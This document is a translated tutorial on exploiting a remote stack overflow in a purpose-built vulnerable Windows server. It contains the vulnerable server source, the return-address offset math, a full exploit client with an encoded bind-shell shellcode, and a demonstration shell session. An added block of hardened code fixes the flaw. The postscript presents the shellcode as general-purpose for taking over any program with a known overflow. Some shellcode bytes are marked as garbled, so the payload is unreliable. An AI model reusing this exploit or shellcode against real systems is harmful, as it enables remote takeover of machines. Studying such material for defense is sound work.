Remote stack overflow under the Windows system - "Battle"

Author: ipxodi (ipxodi@263.net)

The following is an Internet service program with a problem:
/**********************************************************************************/
/*     server.cpp by ipxodi     */

#include <winsock2.h>   /* WSAStartup, socket, bind, listen, accept, recv, send */
#include <stdio.h>
#include <string.h>

char buff[1024];

/* The vulnerable function: s1 holds 50 bytes, but s carries whatever the
 * client sent (up to 1024 bytes) and is copied with an unbounded strcpy(). */
void overflow(char *s, int size)
{
    char s1[50];
    printf("Receive %d bytes", size);
    s[size] = 0;
    strcpy(s1, s);
}

int main()
{
    WSADATA wsa;
    SOCKET listenfd;
    int ret;
    char asd[2048];

    WSAStartup(MAKEWORD(2, 2), &wsa);

    listenfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    struct sockaddr_in server;

    server.sin_family = AF_INET;
    server.sin_port = htons(3764);
    server.sin_addr.s_addr = INADDR_ANY;
    ret = bind(listenfd, (struct sockaddr *)&server, sizeof(server));
    ret = listen(listenfd, 2);

    int iaddrsize = sizeof(server);
    SOCKET clientfd = accept(listenfd, (struct sockaddr *)&server, &iaddrsize);
    int lbytesread;   /* recv() returns int; an unsigned type would hide SOCKET_ERROR */
    while (1) {
        lbytesread = recv(clientfd, buff, 1024, 0);
        if (lbytesread <= 0) break;

        overflow(buff, lbytesread);

        ret = send(clientfd, buff, lbytesread, 0);
        if (ret <= 0) break;
    }
    WSACleanup();
    return 0;
}
/**********************************************************************************/

The function overflow has a problem. Can you see it?

OK, now let's write the overflow attack program:

1) How do we find the overflow (return) address?
(: Huh? Do we have to try it out the way we did with last time's program? I can't read that stuff, can't I just skip it?
 : Hey, brother, last time we didn't have the enemy's source code and were too lazy to read the disassembly, so we had to try.
   Now that the source code is right in front of you, can't you work it out?)

Here is the stack layout at the moment of the overflow:

  memory bottom                                memory top
             buffer          EBP      RET
  <------   [nnnnnnnnn]      [n   ]   [a   ]   SSSS
             ^ &buffer
  stack top

You can see that we declared the buffer as 50 bytes; on a 32-bit system arrays are aligned to 4 bytes, so the actual buffer is
52 bytes. Add the 4 bytes of the saved EBP, 52 + 4 = 56, and RET sits at byte 56.
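An added example (my code, not from the original article) that closes the two defects in server.cpp's overflow(): the unbounded strcpy() into the 50-byte local that the text describes, and one the text does not mention, namely s[size] = 0 writing one past buff when recv() returns the full 1024 bytes. ret_offset() also encodes the 52 + 4 = 56 calculation. The names handle_request, ret_offset and simulate_request are mine; simulate_request() stands in for the recv() loop with a constructed fill of 'A' bytes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define RECV_MAX 1024   /* size of the receive buffer, as in server.cpp */

/* Hardened replacement for overflow(). The terminator write s[size] = 0 is
 * checked against the buffer capacity (recv() may return exactly RECV_MAX
 * bytes, so s[1024] was one past the end of buff), and the unbounded
 * strcpy() into the 50-byte local is replaced by a length check plus
 * memcpy(). Returns 0 on success, -1 when the byte count leaves no room for
 * the terminator, -2 when the payload will not fit the local array. */
int handle_request(char *s, size_t cap, size_t size)
{
    char s1[50];
    if (size >= cap)            /* no room for the terminator in s */
        return -1;
    s[size] = 0;
    if (size >= sizeof s1)      /* strcpy would run over s1 into EBP and RET */
        return -2;
    memcpy(s1, s, size + 1);    /* bounded copy, terminator included */
    printf("Receive %zu bytes\n", size);
    return 0;
}

/* Offset of the saved return address from the start of a local array of
 * `decl` bytes, per the layout above: the array is padded to a 4-byte
 * boundary and the saved EBP takes 4 more bytes (50 -> 52 -> 56). */
size_t ret_offset(size_t decl)
{
    return ((decl + 3) & ~(size_t)3) + 4;
}

/* Constructed stand-in for the server's recv() loop: n bytes of 'A' arrive
 * into the RECV_MAX buffer and are handed to handle_request(). */
int simulate_request(size_t n)
{
    static char buff[RECV_MAX];
    size_t got = n < RECV_MAX ? n : RECV_MAX;
    memset(buff, 'A', got);
    return handle_request(buff, sizeof buff, n);
}
```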

2) What are the addresses of LoadLibrary and GetProcAddress in Server?
Launch W32Dasm and load server.exe:

:004028EC 68F0014200               push 004201F0

* Reference To: KERNEL32.LoadLibraryA, Ord:01C2h
                                  |
:004028F1 FF15E8614200             Call dword ptr [004261E8]

OK, kernel32.LoadLibraryA (the alias of LoadLibrary) is called through the import entry at 0x004261E8.

:00402911 51                       push ecx

* Reference To: KERNEL32.GetProcAddress, Ord:013Eh
                                  |
:00402912 FF15E4614200             Call dword ptr [004261E4]

OK, the entry address of kernel32.GetProcAddress: 0x004261E4.

Both addresses contain a 00 byte, so they cannot be placed directly in the shellcode; hence the following workaround:
   0xbb, 0x99, 0xe8, 0x61, 0x42,     /* mov ebx, 4261E899h                           */
   0xc1, 0xeb, 0x08,                 /* shr ebx, 08  ; ebx = 004261E8h (&LoadLibrary) */
as well as
   0xb3, 0xe4,                       /* mov bl, E4h  ; ebx = 004261E4h (&GetProcAddress) */

3) Write a client:
/**********************************************************************************/
/*     client.cpp by ipxodi     */

#include <winsock2.h>
#include <string.h>
#define Win2000

#ifdef Win2000
#define jumpesp "\x2a\xe3\xe2\x77"
#endif
#ifdef Win98
#define jumpesp "\xa3\x95\xf7\xbf"
#endif

unsigned char eip[8] = jumpesp;
unsigned char sploit[580] = {
    0x90, 0x8b, 0xfc, 0x33, 0xc0, 0x50, 0x59, 0xf2, 0xaf, 0x59, 0xb1, 0xc6,
    0x8b, 0xc7, 0x48, 0x80, 0x30, 0x99, 0xe2, 0xfa, 0x33, 0xf6, 0x96, 0xbb,
    0x99, 0xe8, 0x61, 0x42, 0xc1, 0xeb, 0x08, 0x56, 0xff, 0x13, 0x8b, 0xd0,
    0xfc, 0x33, 0xc9, 0xb1, 0x0b, 0x49, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75,
    0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe4, 0xff, 0x13, 0xab, 0x59, 0x5a,
    0xe2, 0xec, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75, 0xf9, 0xb3, 0xe8, 0x56,
    0xff, 0x13, 0x8b, 0xd0, 0xfc, 0x33, 0xc9, 0xb1, 0x06, 0x32, 0xc0, 0xac,
    0x84, 0xc0, 0x75, 0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe4, 0xff, 0x13,
    0xab, 0x59, 0x5a, 0xe2, 0xec, 0x83, 0xc6, 0x05, 0x33, 0xc0, 0x50, 0x40,
    0x50, 0x40, 0x50, 0xff, 0x57, 0xe8, 0x93, 0x6a, 0x10, 0x56, 0x53, 0xff,
    0x57, 0xec, 0x6a, 0x02, 0x53, 0xff, 0x57, 0xf0, 0x33, 0xc0, 0x57, 0x50,
    0xb0, 0x0c, 0xab, 0x58, 0xab, 0x40, 0xab, 0x5f, 0x48, 0x50, 0x57, 0x56,
    0xad, 0x56, 0xf, 0x57, 0xc0, 0x48, 0x50, 0x57, 0xad, 0x56, 0xad, 0x56,   /* "0xf" is garbled in the source */
    0xff, 0x57, 0xc0, 0x48, 0xb0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,
    0x33, 0xc0, 0x8b, 0x46, 0xf4, 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,
    0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,
    0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,
    0x50, 0xad, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,
    0xff, 0x57, 0xcc, 0xf, 0x76, 0xfc, 0xff, 0x57, 0xcc, 0x48, 0x50, 0x50,   /* "0xf" is garbled in the source */
    0x53, 0xff, 0x57, 0xf4, 0x8b, 0xd8, 0x33, 0xc0, 0xb4, 0x04, 0x50, 0xc1,
    0xe8, 0x04, 0x50, 0xff, 0x57, 0xd4, 0x8b, 0xf0, 0x33, 0xc0, 0x8b, 0xc8,
    0xb5, 0x04, 0x50, 0x50, 0x57, 0x51, 0x56, 0xff, 0x77, 0xa8, 0xff, 0x57,
    0xd0, 0x83, 0x3f, 0x01, 0x7c, 0x22, 0x33, 0xc0, 0x50, 0x57, 0xff, 0x37,
    0x56, 0xff, 0x77, 0xa8, 0x0b, 0x57, 0x74, 0x2f, 0x33,
    0xc0, 0x50, 0xff, 0x37, 0x56, 0x53, 0x, 0x57, 0xf8, 0x6a, 0x50, 0xff,   /* "0x," is garbled in the source */
    0x57, 0xe0, 0xeb, 0xc8, 0x33, 0xc0, 0x50, 0xb4, 0x04, 0x50, 0x56, 0x53,
    0xff, 0x57, 0xfc, 0x57, 0x33, 0xc9, 0x51, 0x50, 0x56, 0xff, 0x77, 0xac,
    0xff, 0x57, 0xd8, 0x6a, 0x50, 0xff, 0x57, 0xe0, 0xeb, 0xaa, 0x50, 0xff,
    0x57, 0xe4, 0x90, 0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
    0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
    0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
    0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
    0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
    0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
    0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
    0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
    0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
    0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
    0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
    0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
    0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
    0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
    0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
    0x4b, 0x9d,   // port = 53764
    0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
    0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
    0x0d, 0x0a};
int main()
{
    WSADATA wsa;
    SOCKET sockfd;
    char buff[1024];   /* declarations lost in the source; buff and sbo are used below */
    char *sbo;

    WSAStartup(MAKEWORD(2, 2), &wsa);
    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    struct sockaddr_in server;

    server.sin_family = AF_INET;
    server.sin_port = htons(3764);
    server.sin_addr.s_addr = inet_addr("127.0.0.1");

    connect(sockfd, (struct sockaddr *)&server, sizeof(server));
    for (int i = 0; i < 56; buff[i++] = 0x90);   /* bytes 0..55: buffer plus saved EBP */
    strcpy(buff + 56, (char *)eip);               /* bytes 56..59: RET, see the layout above */
    strcpy(buff + 60, (char *)sploit);            /* the shellcode follows RET */
    sbo = buff;
    send(sockfd, sbo, 56 + 4 + 560, 0);

    closesocket(sockfd);
    WSACleanup();
    return 1;

}
/**********************************************************************************/
Run the server, then run the client. Now telnet localhost 53764: what do you see?

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1998 Microsoft Corp.

D:\myProjects\Server>DIR
DIR
 The volume in drive D has no label.
 The serial number of the volume is 3C2F-72BB

 Directory of D:\myprojects\server

2000-04-26  17:52       <DIR>          .
2000-04-26  17:52       <DIR>          ..
2000-04-25  11:17       <DIR>          debug
2000-04-23  20:23                3,288 Server.001
2000-04-25  11:16                  926 Server.cpp
2000-04-25  10:33                3,325 Server.dsp
2000-04-25  10:33                  535 Server.dsw
2000-04-26  17:52               41,984 Server.ncb
2000-04-26  17:52               49,664 Server.opt
2000-04-25  11:24                  509 Server.plg
               7 file(s)        100,231 bytes
               3 dir(s)   8,688,173,056 bytes free

D:\myProjects\Server>

Oh, I'm big.


----postscript
As everyone can see, this is a general-purpose remote overflow shellcode for Windows.
With this shellcode and a few changes, we can write other remote overflow programs
and remotely control any program with a known buffer overflow problem.

In fact, to find overflow vulnerabilities you must dig deep into the enemy's program code
and locate the problematic code. This is exactly where Windows crackers come in: your
crack-tracing skills will find their fullest use in this field. I estimate that in the near
future many crackers will publish a whole series of Windows buffer overflow vulnerabilities.

What is shown above is just an experimental server program. In fact,
we have already completed the implementation of the OICQ remote overflow and ported IISHACK to Chinese NT.

When I telnet to Victim 53764, the enemy's machine is taken, and when I see his autoexec.001,
it truly is all in my hands. What I thought in my heart was:
The remote overflow era of Windows NT/2000 has begun! We no longer need Trojans!

Because the above programs are too powerful, I will not publish their source code. I hope that
if anyone writes a remote overflow program based on my shellcode, they will first inform the software vendor,
wait for the patch, and only then publish their overflow program.

Because the purpose of discovering vulnerabilities is not to destroy, but to eliminate vulnerabilities and improve security.

----bibliography:
0) ipxodi, "Stack overflow under the Windows system", NSFocus Magazine, 2000 no. 3.
1) The classic article by Dark Spyrit aka Barnaby Jack in Phrack Magazine 55.
2) Backend, "Windows 2000 Buffer Overflow", NSFocus Magazine, 2000 no. 4.
3) "Windows Network Programming Technology", Anthony Jones and Jim Ohlund (China Machine Press edition, Jingjing translation).

---- Acknowledgment
There are many people I want to thank:
Dark Spyrit, I pay tribute to your genius and selflessness.
Thanks to the great Backend, Yuange and Zer9 for your research results and selfless help,
and of course to TT, Deepin and everyone at Green Alliance for help with the attack practice.
Thanks to everyone who has helped and inspired me.